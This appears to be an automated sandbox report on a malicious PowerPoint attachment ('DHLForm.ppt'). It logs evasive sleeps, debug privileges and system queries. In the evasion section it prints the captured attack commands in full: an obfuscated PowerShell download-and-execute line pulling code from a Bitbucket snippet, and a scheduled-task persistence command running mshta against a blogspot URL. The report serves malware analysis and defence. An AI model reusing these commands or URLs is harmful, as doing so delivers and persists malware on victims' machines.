Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 2920 Thread sleep time: -780000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1256 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 1500 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1408 Thread sleep time: -660000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 668 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2772 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2772 Thread sleep time: -480000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 632 Thread sleep time: -420000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2344 Thread sleep time: -540000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 944 Thread sleep time: -540000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 380 Thread sleep time: -480000s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 0000000B.00000002.438552411.00000000002CD000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\mshta.exe Memory protected: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\'' Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\'' Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHtA.EXE 'http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html' Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); Jump to behavior
Source: taskeng.exe, 0000000F.00000002.676672918.0000000000780000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: taskeng.exe, 0000000F.00000002.676672918.0000000000780000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: taskeng.exe, 0000000F.00000002.676672918.0000000000780000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs